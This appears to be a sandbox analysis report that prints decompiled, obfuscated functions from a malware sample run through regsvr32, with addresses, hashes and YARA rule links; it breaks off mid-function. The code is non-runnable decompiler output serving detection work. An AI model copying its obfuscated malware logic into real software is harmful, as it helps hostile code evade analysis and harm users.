Download Yara Rule

C-Code - Quality: 87%

			E040E7A0F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				char _v596;
				void* _t147;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t147);
				_v72 = _v72 & 0x00000000;
				_v68 = _v68 & 0x00000000;
				_v76 = 0xac6bc1;
				_v48 = 0x918367;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x000cf094;
				_v36 = 0xe92c2d;
				_v36 = _v36 ^ 0xfac2eab7;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0xe346c7b1;
				_v64 = 0xc08572;
				_t170 = 0x1e;
				_v64 = _v64 / _t170;
				_v64 = _v64 ^ 0x00015c03;
				_v12 = 0x9212d2;
				_t171 = 0x1d;
				_v12 = _v12 * 0x39;
				_v12 = _v12 + 0x3383;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x08263998;
				_v32 = 0xc20336;
				_v32 = _v32 * 0x70;
				_v32 = _v32 ^ 0x74671eb1;
				_v32 = _v32 ^ 0x2084f54c;
				_v40 = 0xa9787c;
				_v40 = _v40 ^ 0x381c5a49;
				_v40 = _v40 | 0x64fc5a0b;
				_v40 = _v40 ^ 0x7cf9cebd;
				_v20 = 0x646c84;
				_v20 = _v20 * 0xa;
				_v20 = _v20 ^ 0x10bf9a9f;
				_v20 = _v20 ^ 0x793d42f9;
				_v20 = _v20 ^ 0x6a6515eb;
				_v60 = 0xc09cf0;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0x813cbcc6;
				_v8 = 0xc99b6c;
				_v8 = _v8 * 0x26;
				_v8 = _v8 + 0xffff7686;
				_v8 = _v8 ^ 0x08dcc16a;
				_v8 = _v8 ^ 0x1531615b;
				_v44 = 0x17c218;
				_v44 = _v44 | 0xd7791395;
				_v44 = _v44 + 0xde66;
				_v44 = _v44 ^ 0xd7809290;
				_v28 = 0x8f3b5f;
				_v28 = _v28 >> 0xb;
				_v28 = _v28 * 0x5e;
				_v28 = _v28 ^ 0x00039abd;
				_v56 = 0xe3e33c;
				_v56 = _v56 * 0x69;
				_v56 = _v56 ^ 0x5d7c15ff;
				_v52 = 0x7e8124;
				_v52 = _v52 + 0xc0d9;
				_v52 = _v52 ^ 0x007e7944;
				_v24 = 0x2edb0b;
				_v24 = _v24 / _t171;
				_t172 = 0x3a;
				_v24 = _v24 / _t172;
				_t173 = 0x6f;
				_v24 = _v24 / _t173;
				_v24 = _v24 ^ 0x00044e1b;
				_v16 = 0xd6e45b;
				_v16 = _v16 * 0x6a;
				_v16 = _v16 | 0xc518fde9;
				_v16 = _v16 + 0xffff1d23;
				_v16 = _v16 ^ 0xddf5a256;
				_push(_v12);
				_push(_v64);
				_push(_v36);
				E040E2C9C(_v40, _v16, E040EE1F8(0x40d170c, _v48, _v16),  &_v596, 0x40d170c, _v20, __edx);
				E040EFECB(_t164, _v60, _v8, _v44, _v28);
				return E040DD061( &_v596, _v56, _v52, _v24, _v16);
			}

0x040e7a1a
0x040e7a1f
0x040e7a22
0x040e7a25
0x040e7a26
0x040e7a27
0x040e7a2c
0x040e7a32
0x040e7a36
0x040e7a3d
0x040e7a44
0x040e7a48
0x040e7a4f
0x040e7a56
0x040e7a5d
0x040e7a61
0x040e7a68
0x040e7a74
0x040e7a79
0x040e7a7e
0x040e7a85
0x040e7a90
0x040e7a91
0x040e7a94
0x040e7a9b
0x040e7a9f
0x040e7aa6
0x040e7ab1
0x040e7ab4
0x040e7abb
0x040e7ac2
0x040e7ac9
0x040e7ad0
0x040e7ad7
0x040e7ade
0x040e7ae9
0x040e7aec
0x040e7af3
0x040e7afa
0x040e7b01
0x040e7b08
0x040e7b0c
0x040e7b13
0x040e7b1e
0x040e7b21
0x040e7b28
0x040e7b2f
0x040e7b36
0x040e7b3d
0x040e7b44
0x040e7b4b
0x040e7b52
0x040e7b59
0x040e7b61
0x040e7b64
0x040e7b6b
0x040e7b76
0x040e7b79
0x040e7b80
0x040e7b87
0x040e7b8e
0x040e7b95
0x040e7ba1
0x040e7ba9
0x040e7bb0
0x040e7bb8
0x040e7bc0
0x040e7bc3
0x040e7bca
0x040e7bd5
0x040e7bd8
0x040e7bdf
0x040e7be6
0x040e7bed
0x040e7bf0
0x040e7bf3
0x040e7c16
0x040e7c29
0x040e7c4d

Strings

-,, xrefs: 040E7A4F
Dy~, xrefs: 040E7B8E
<, xrefs: 040E7B6B

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -,$<$Dy~
API String ID: 0-1106285139
Opcode ID: d91c6384704e46a68b9340d4a55fc0ecaf02a910df9108a153ddf35b62d692f3
Instruction ID: 2b9e20767531577edfc70fab29ea768acd8a00fc1ce25248f7cf7ea84eb828c7
Opcode Fuzzy Hash: d91c6384704e46a68b9340d4a55fc0ecaf02a910df9108a153ddf35b62d692f3
Instruction Fuzzy Hash: 2A61EE71C0120EEBDF08CFE5E98A9EEBBB2FB48314F208149E111B6260D7B55A55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 040D7442, Relevance: 3.9, Strings: 3, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E040D7442(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				void* _t68;
				intOrPtr _t81;
				signed int _t82;
				signed int _t87;
				signed int _t88;
				void* _t91;
				intOrPtr _t105;
				intOrPtr* _t106;
				void* _t107;
				signed int* _t111;

				_push(_a16);
				_t106 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E040EFE29(_t68);
				_v24 = 0x62b98c;
				_t111 =  &(( &_v28)[6]);
				_t107 = 0;
				_t91 = 0x56d49db;
				_t87 = 0x32;
				_v24 = _v24 * 0x4b;
				_v24 = _v24 / _t87;
				_v24 = _v24 + 0xffff2f8c;
				_v24 = _v24 ^ 0x009a9eb5;
				_v16 = 0xcd53e2;
				_t88 = 0x3a;
				_v16 = _v16 * 0x65;
				_v16 = _v16 + 0xffffa8ae;
				_v16 = _v16 ^ 0x510428a2;
				_v28 = 0xd5f3ee;
				_v28 = _v28 ^ 0x77e73800;
				_v28 = _v28 / _t88;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x0000e246;
				_v20 = 0x9cb423;
				_v20 = _v20 + 0x5dad;
				_v20 = _v20 ^ 0xe88d7dca;
				_v20 = _v20 ^ 0xe81c7203;
				_v4 = 0x5f6be5;
				_t46 =  &_v4; // 0x5f6be5
				_v4 =  *_t46 * 0x5c;
				_v4 = _v4 ^ 0x224497bb;
				_v8 = 0xac6149;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x0020023e;
				_v12 = 0x405ac1;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x000eeb29;
				do {
					while(_t91 != 0x56d49db) {
						if(_t91 == 0x845f35b) {
							_t82 = E040E0F86(_t106);
							asm("sbb ecx, ecx");
							_t91 = ( ~_t82 & 0xfe625aa0) + 0xd9296b1;
							continue;
						} else {
							if(_t91 == 0xbb8a3c5) {
								E040E0D04();
								_t91 = 0xd9296b1;
								continue;
							} else {
								if(_t91 == 0xbf4f151) {
									if(E040E8FAE(_a4) != 0) {
										_t107 = 1;
									} else {
										_t91 = 0xbb8a3c5;
										continue;
									}
								} else {
									if(_t91 != 0xd9296b1) {
										goto L12;
									} else {
										_t105 =  *0x40f6224; // 0x0
										E040F2B09(_v4, _t105, _v8, _v12);
									}
								}
							}
						}
						L15:
						return _t107;
					}
					_push(_t91);
					_push(_t91);
					_t81 = E040DC5D8(0x64);
					_t111 =  &(_t111[3]);
					 *0x40f6224 = _t81;
					_t91 = 0x845f35b;
					L12:
				} while (_t91 != 0xd85fda5);
				goto L15;
			}

0x040d7449
0x040d744d
0x040d744f
0x040d7453
0x040d7457
0x040d745c
0x040d745d
0x040d7462
0x040d746a
0x040d7474
0x040d7476
0x040d7482
0x040d7483
0x040d748f
0x040d7495
0x040d749d
0x040d74a5
0x040d74b2
0x040d74b3
0x040d74b7
0x040d74bf
0x040d74c7
0x040d74cf
0x040d74e2
0x040d74e6
0x040d74eb
0x040d74f3
0x040d74fb
0x040d7503
0x040d750b
0x040d7513
0x040d751b
0x040d7520
0x040d7524
0x040d752c
0x040d7534
0x040d7539
0x040d7541
0x040d7549
0x040d754e
0x040d7556
0x040d7556
0x040d7564
0x040d75ad
0x040d75b6
0x040d75be
0x00000000
0x040d7566
0x040d7568
0x040d75a2
0x040d75a7
0x00000000
0x040d756a
0x040d7570
0x040d759c
0x040d75f8
0x040d759e
0x040d759e
0x00000000
0x040d759e
0x040d7572
0x040d7574
0x00000000
0x040d7576
0x040d757e
0x040d7588
0x040d758e
0x040d7574
0x040d7570
0x040d7568
0x040d75fa
0x040d7602
0x040d7602
0x040d75d2
0x040d75d3
0x040d75d6
0x040d75db
0x040d75de
0x040d75e3
0x040d75e8
0x040d75e8
0x00000000

Strings

k_, xrefs: 040D751B
F, xrefs: 040D74EB
K3xq, xrefs: 040D7446

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: F$K3xq$k_
API String ID: 0-3174058581
Opcode ID: a9574229f9dfcda975742413f6cd1e3d1d11b9d9b59ba059d1d1621aad478d00
Instruction ID: 05394fc50d87dc3fca9eff061a5f090b71f193b85d61b0e7921bba3ba333b4fe
Opcode Fuzzy Hash: a9574229f9dfcda975742413f6cd1e3d1d11b9d9b59ba059d1d1621aad478d00
Instruction Fuzzy Hash: 3741BC706083029FD758EF25D48582FBBE1FBC4348F000A1EF585A7265D7B4AA088B83

Uniqueness

Uniqueness Score: -1.00%

Function 040EA2A5, Relevance: 3.9, Strings: 3, Instructions: 105
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E040EA2A5(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				signed int _t127;
				intOrPtr _t136;

				_v56 = _v56 & 0x00000000;
				_v68 = 0x56d43f;
				_v64 = 0xa378a6;
				_v60 = 0xa37ee;
				_v44 = 0x7acd08;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x000369a9;
				_v12 = 0x8bcc43;
				_v12 = _v12 << 6;
				_v12 = _v12 | 0x230a0204;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0xfb180412;
				_v8 = 0x75376c;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x2bde3cb3;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x15e166f0;
				_v36 = 0x2455a;
				_v36 = _v36 >> 2;
				_v36 = _v36 + 0xffff434e;
				_v36 = _v36 ^ 0xfff24d76;
				_v20 = 0x28ad7b;
				_v20 = _v20 << 6;
				_v20 = _v20 << 0x10;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x00010bf1;
				_v16 = 0xc11cd7;
				_v16 = _v16 >> 4;
				_v16 = _v16 >> 5;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x000c5122;
				_v48 = 0x6ce03d;
				_v48 = _v48 ^ 0x08e870e9;
				_v48 = _v48 ^ 0x08851ea6;
				_v40 = 0xece1ae;
				_v40 = _v40 | 0xa708c82b;
				_v40 = _v40 + 0xffff66a5;
				_v40 = _v40 ^ 0xa7eb2511;
				_v52 = 0x51901b;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x0285bcb2;
				_v32 = 0xe2234;
				_v32 = _v32 ^ 0x801b0981;
				_v32 = _v32 + 0xffff47d0;
				_v32 = _v32 + 0x1bdf;
				_v32 = _v32 ^ 0x8011a9a9;
				_v28 = 0xf9a2d;
				_v28 = _v28 + 0xffff0cd9;
				_t127 = 0x38;
				_t136 = _a4;
				_v28 = _v28 * 0x39;
				_v28 = _v28 + 0xf1da;
				_v28 = _v28 ^ 0x0344abfa;
				_v24 = 0x8a904b;
				_v24 = _v24 + 0x44ce;
				_v24 = _v24 / _t127;
				_v24 = _v24 << 0xc;
				_v24 = _v24 ^ 0x27a49ff9;
				_t121 =  *((intOrPtr*)(_t136 + 0x2c))( *((intOrPtr*)(_t136 + 0x38)), 1, 0);
				_t143 = _t121;
				if(_t121 != 0) {
					_push(_v36);
					_push(_v8);
					_push(0x40d18ec);
					_t123 = E040E4244(_v44, _v12, _t143);
					_push(_v40);
					_t138 = _t123;
					_push(_v48);
					_push(_t123);
					_push( *((intOrPtr*)(_t136 + 0x38)));
					_t124 = E040F3560(_v20, _v16);
					if(_t124 != 0) {
						 *_t124();
					}
					E040EFECB(_t138, _v52, _v32, _v28, _v24);
				}
				return 0;
			}

0x040ea2ac
0x040ea2b2
0x040ea2b9
0x040ea2c0
0x040ea2c7
0x040ea2ce
0x040ea2d2
0x040ea2d9
0x040ea2e0
0x040ea2e4
0x040ea2eb
0x040ea2ef
0x040ea2f6
0x040ea2fd
0x040ea301
0x040ea308
0x040ea30b
0x040ea312
0x040ea319
0x040ea31d
0x040ea324
0x040ea32b
0x040ea332
0x040ea336
0x040ea33a
0x040ea33e
0x040ea345
0x040ea34c
0x040ea350
0x040ea354
0x040ea358
0x040ea35f
0x040ea366
0x040ea36d
0x040ea374
0x040ea37b
0x040ea382
0x040ea389
0x040ea390
0x040ea397
0x040ea39b
0x040ea3a2
0x040ea3a9
0x040ea3b0
0x040ea3b7
0x040ea3be
0x040ea3c5
0x040ea3cc
0x040ea3d9
0x040ea3da
0x040ea3dd
0x040ea3e0
0x040ea3e7
0x040ea3ee
0x040ea3f5
0x040ea403
0x040ea406
0x040ea40a
0x040ea416
0x040ea419
0x040ea41b
0x040ea41e
0x040ea421
0x040ea42a
0x040ea42f
0x040ea434
0x040ea437
0x040ea439
0x040ea442
0x040ea443
0x040ea446
0x040ea450
0x040ea452
0x040ea452
0x040ea462
0x040ea46a
0x040ea471

Strings

=l, xrefs: 040EA35F
l7u, xrefs: 040EA2F6
7, xrefs: 040EA2C0

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =l$l7u$7
API String ID: 0-2380881030
Opcode ID: 07406fa2199e9fce04a77e22be33b9a76e977e8e0cc9d61b6e03b1a06477bc96
Instruction ID: af15d617a068248b670d18183d562391d5cb7eddf395055e6fdf1e8d54d9e9f3
Opcode Fuzzy Hash: 07406fa2199e9fce04a77e22be33b9a76e977e8e0cc9d61b6e03b1a06477bc96
Instruction Fuzzy Hash: 84511F71D0020AABDF44CFE5D98A5EEBBB1FF44318F208158D922B6210D7B54A59CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 040DBAA9, Relevance: 3.8, Strings: 3, Instructions: 89
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E040DBAA9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* _t91;
				signed int _t109;
				signed int _t110;
				signed int _t119;
				signed int _t120;

				_t119 = _a12;
				_push(_t119);
				_push(_a8);
				_push(_a4);
				E040EFE29(_t91);
				_v36 = _v36 & 0x00000000;
				_v40 = 0x12a44;
				_v16 = 0x6d7ae4;
				_t109 = 9;
				_v16 = _v16 * 0x2c;
				_v16 = _v16 ^ 0x12d84a78;
				_v8 = 0x632f63;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x2f02a769;
				_v8 = _v8 + 0xffffcf5a;
				_v8 = _v8 ^ 0xb8bafcbb;
				_a12 = 0xb71f5c;
				_a12 = _a12 + 0x2974;
				_a12 = _a12 / _t109;
				_t110 = 0x4b;
				_a12 = _a12 * 0x6a;
				_a12 = _a12 ^ 0x0865fbc8;
				_v28 = 0x14d1df;
				_v28 = _v28 + 0x8244;
				_v28 = _v28 ^ 0x001f502f;
				_v24 = 0x8a40f8;
				_v24 = _v24 | 0x61e91a85;
				_v24 = _v24 ^ 0x61e69297;
				_v32 = 0x91ce11;
				_v32 = _v32 + 0xffffd148;
				_v32 = _v32 ^ 0x009b82ce;
				_v20 = 0xf1824f;
				_v20 = _v20 / _t110;
				_v20 = _v20 ^ 0x68027ae2;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x3404b933;
				E040DDC1B(_t110);
				_v16 = 0x8712a3;
				_v16 = _v16 + 0xf3d2;
				_v16 = _v16 + 0xffff1cdd;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004395;
				_v12 = 0x6a396b;
				_v12 = _v12 | 0x9b16e6b5;
				_v12 = _v12 << 0xd;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x006fffe0;
				_t120 = E040ECCA0(_v16, _v12);
				E040DE404(_v32, 1, _v20, _t120, _t119);
				 *((short*)(_t119 + _t120 * 2)) = 0;
				return 0;
			}

0x040dbab1
0x040dbab4
0x040dbab5
0x040dbab8
0x040dbabd
0x040dbac2
0x040dbac8
0x040dbacf
0x040dbadc
0x040dbadf
0x040dbae2
0x040dbae9
0x040dbaf0
0x040dbaf4
0x040dbafb
0x040dbb02
0x040dbb09
0x040dbb10
0x040dbb1e
0x040dbb25
0x040dbb26
0x040dbb29
0x040dbb30
0x040dbb37
0x040dbb3e
0x040dbb45
0x040dbb4c
0x040dbb53
0x040dbb5a
0x040dbb61
0x040dbb68
0x040dbb6f
0x040dbb7b
0x040dbb7e
0x040dbb85
0x040dbb88
0x040dbb92
0x040dbb97
0x040dbba1
0x040dbba8
0x040dbbaf
0x040dbbb3
0x040dbbba
0x040dbbc1
0x040dbbc8
0x040dbbcc
0x040dbbd0
0x040dbbee
0x040dbbfb
0x040dbc05
0x040dbc0e

Strings

c/c, xrefs: 040DBAE9
zm, xrefs: 040DBACF
k9j, xrefs: 040DBBBA

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: c/c$k9j$zm
API String ID: 0-1793526708
Opcode ID: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
Instruction ID: 2298ce69ff8245e911da0746e77fee9d82ebba73ab64161cc3895fafc5e51b2a
Opcode Fuzzy Hash: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
Instruction Fuzzy Hash: 9D410372D0030AABDB04DFA5D84A5EEBBB6FF44318F108558E521A6260E7B49B64CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001FC43, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1001FC43(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E1001BD6F());
				 *0x1005b670 = 0;
				return _t8;
			}

0x1001fc48
0x1001fc58
0x1001fc5e
0x1001fc65

APIs

__decode_pointer.LIBCMT ref: 1001FC51

Part of subcall function 1001BD6F: TlsGetValue.KERNEL32(?,1001C0FD,00000000,00000000,10017A84,00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840), ref: 1001BD7C
Part of subcall function 1001BD6F: TlsGetValue.KERNEL32(00000006,?,1001C0FD,00000000,00000000,10017A84,00000000,?,?,00000001,?,?,10017AE8,00000001), ref: 1001BD93

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001FC58

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Value$ExceptionFilterUnhandled__decode_pointer
String ID:
API String ID: 1958600898-0
Opcode ID: c0118062e478c14860ac704cd26963d59993939b078219122e56b5b05da27951
Instruction ID: 8c383471f53841a55e0fcdb182c1f4564aa38491823c170ddba15b1e5c66fe32
Opcode Fuzzy Hash: c0118062e478c14860ac704cd26963d59993939b078219122e56b5b05da27951
Instruction Fuzzy Hash: E0C04C59818ED49AE715DF745C9D70D7F14E712508FD40589D480851A2DE6CA049C931

Uniqueness

Uniqueness Score: -1.00%

Function 040EAD08, Relevance: 2.7, Strings: 2, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E040EAD08() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t263;
				intOrPtr _t264;
				intOrPtr _t267;
				void* _t273;
				void* _t277;
				intOrPtr _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int* _t322;

				_t322 =  &_v1144;
				_v1052 = 0x3e8be7;
				_t310 = 0;
				_t277 = 0xe4a3d19;
				_v1048 = 0;
				_v1044 = 0;
				_v1100 = 0x8001b8;
				_t311 = 0x1c;
				_v1100 = _v1100 / _t311;
				_v1100 = _v1100 + 0x9b02;
				_v1100 = _v1100 ^ 0x0003825e;
				_v1104 = 0x6ba50e;
				_v1104 = _v1104 + 0x86a8;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 ^ 0xb0a58b81;
				_v1064 = 0xa5f60f;
				_v1064 = _v1064 ^ 0xf15b406a;
				_v1064 = _v1064 ^ 0xf1fbbabe;
				_v1116 = 0xfce2df;
				_v1116 = _v1116 ^ 0xb7cf3da1;
				_v1116 = _v1116 + 0x963f;
				_v1116 = _v1116 ^ 0x6f9af2b2;
				_v1116 = _v1116 ^ 0xd8ae206e;
				_v1132 = 0x6fbbde;
				_v1132 = _v1132 | 0xe49a2ecd;
				_v1132 = _v1132 + 0xd857;
				_v1132 = _v1132 + 0xffffaa9b;
				_v1132 = _v1132 ^ 0xe507ae81;
				_v1096 = 0xa4704d;
				_v1096 = _v1096 + 0x7787;
				_t312 = 0x67;
				_v1096 = _v1096 / _t312;
				_v1096 = _v1096 ^ 0x00025cd8;
				_v1084 = 0x38937;
				_t313 = 0x79;
				_v1084 = _v1084 * 0x4f;
				_v1084 = _v1084 ^ 0x5b1a1bbe;
				_v1084 = _v1084 ^ 0x5a043b4e;
				_v1136 = 0x1276ee;
				_v1136 = _v1136 + 0xffffa0e4;
				_v1136 = _v1136 + 0xffff74bb;
				_v1136 = _v1136 << 2;
				_v1136 = _v1136 ^ 0x0044c443;
				_v1068 = 0xe79065;
				_v1068 = _v1068 << 0xc;
				_v1068 = _v1068 + 0xcbe6;
				_v1068 = _v1068 ^ 0x7908daa4;
				_v1088 = 0x9a4bed;
				_v1088 = _v1088 + 0xfffff274;
				_v1088 = _v1088 + 0xb36d;
				_v1088 = _v1088 ^ 0x00951f6d;
				_v1144 = 0x62e226;
				_v1144 = _v1144 ^ 0x3dd3a3b2;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff6a42;
				_v1144 = _v1144 ^ 0x0008f37a;
				_v1108 = 0x394fd6;
				_v1108 = _v1108 * 0x13;
				_v1108 = _v1108 / _t313;
				_v1108 = _v1108 ^ 0x00080299;
				_v1120 = 0x93d07f;
				_v1120 = _v1120 << 0xa;
				_t314 = 5;
				_v1120 = _v1120 / _t314;
				_v1120 = _v1120 ^ 0x44bcf5d7;
				_v1120 = _v1120 ^ 0x4b68940f;
				_v1072 = 0xc1f636;
				_v1072 = _v1072 | 0x86bbf578;
				_t315 = 0x47;
				_v1072 = _v1072 * 0x24;
				_v1072 = _v1072 ^ 0xfb68157e;
				_v1080 = 0x3ac036;
				_v1080 = _v1080 + 0xffffbaa8;
				_v1080 = _v1080 ^ 0x136d94c6;
				_v1080 = _v1080 ^ 0x1353f0eb;
				_v1128 = 0xb3095e;
				_v1128 = _v1128 / _t315;
				_v1128 = _v1128 | 0xf7128eca;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x0004e558;
				_v1076 = 0x73500f;
				_v1076 = _v1076 | 0x9d7bc413;
				_v1076 = _v1076 + 0xffff6f55;
				_v1076 = _v1076 ^ 0x9d72e045;
				_v1124 = 0xc98916;
				_v1124 = _v1124 + 0x2b72;
				_v1124 = _v1124 | 0x4777986b;
				_t316 = 0x69;
				_v1124 = _v1124 / _t316;
				_v1124 = _v1124 ^ 0x00ab5a68;
				_v1140 = 0xc8b3ea;
				_t317 = 0x7e;
				_v1140 = _v1140 / _t317;
				_v1140 = _v1140 | 0x89e2a6fa;
				_v1140 = _v1140 >> 4;
				_v1140 = _v1140 ^ 0x08902903;
				_v1092 = 0x846906;
				_v1092 = _v1092 | 0x1b02230c;
				_v1092 = _v1092 + 0xffff209e;
				_v1092 = _v1092 ^ 0x1b8bec31;
				_v1056 = 0xaf8c32;
				_t318 = 0x2e;
				_v1056 = _v1056 / _t318;
				_v1056 = _v1056 ^ 0x00017103;
				_v1060 = 0x7e9355;
				_v1060 = _v1060 >> 0x10;
				_v1060 = _v1060 ^ 0x0008a840;
				_v1112 = 0x76e6c0;
				_v1112 = _v1112 ^ 0x1858c3ee;
				_t319 = 0x68;
				_v1112 = _v1112 / _t319;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0x000255a3;
				do {
					while(_t277 != 0xc59040) {
						if(_t277 == 0x420aa66) {
							_push(_v1084);
							_push(_v1096);
							_push(_v1132);
							_t263 = E040EE1F8(0x40d1000, _v1116, __eflags);
							_t264 =  *0x40f6214; // 0x0
							_t267 =  *0x40f6214; // 0x0
							E040F2D0A(_v1068, __eflags, _t267 + 0x23c, _v1088, _v1144, _v1108, 0x40d1000,  &_v1040, _t264 + 0x34, _t263);
							E040EFECB(_t263, _v1120, _v1072, _v1080, _v1128);
							_t322 =  &(_t322[0xe]);
							_t277 = 0x835dcf5;
							continue;
						} else {
							if(_t277 == 0x835dcf5) {
								_t273 = E040E654A(_v1076, _v1124, __eflags,  &_v520, _v1140,  &_v1040);
								_t322 =  &(_t322[3]);
								__eflags = _t273;
								_t310 =  !=  ? 1 : _t310;
								_t277 = 0xb7cde49;
								continue;
							} else {
								if(_t277 == 0xb7cde49) {
									E040E7A0F(_v1092,  &_v1040, _v1056, _v1060, _v1112);
								} else {
									if(_t277 != 0xe4a3d19) {
										goto L10;
									} else {
										_t277 = 0xc59040;
										continue;
									}
								}
							}
						}
						L13:
						return _t310;
					}
					E040F0DB1(_v1100,  &_v520, __eflags, _v1104, _t277, _v1064);
					_t322 =  &(_t322[3]);
					_t277 = 0x420aa66;
					L10:
					__eflags = _t277 - 0xd159d29;
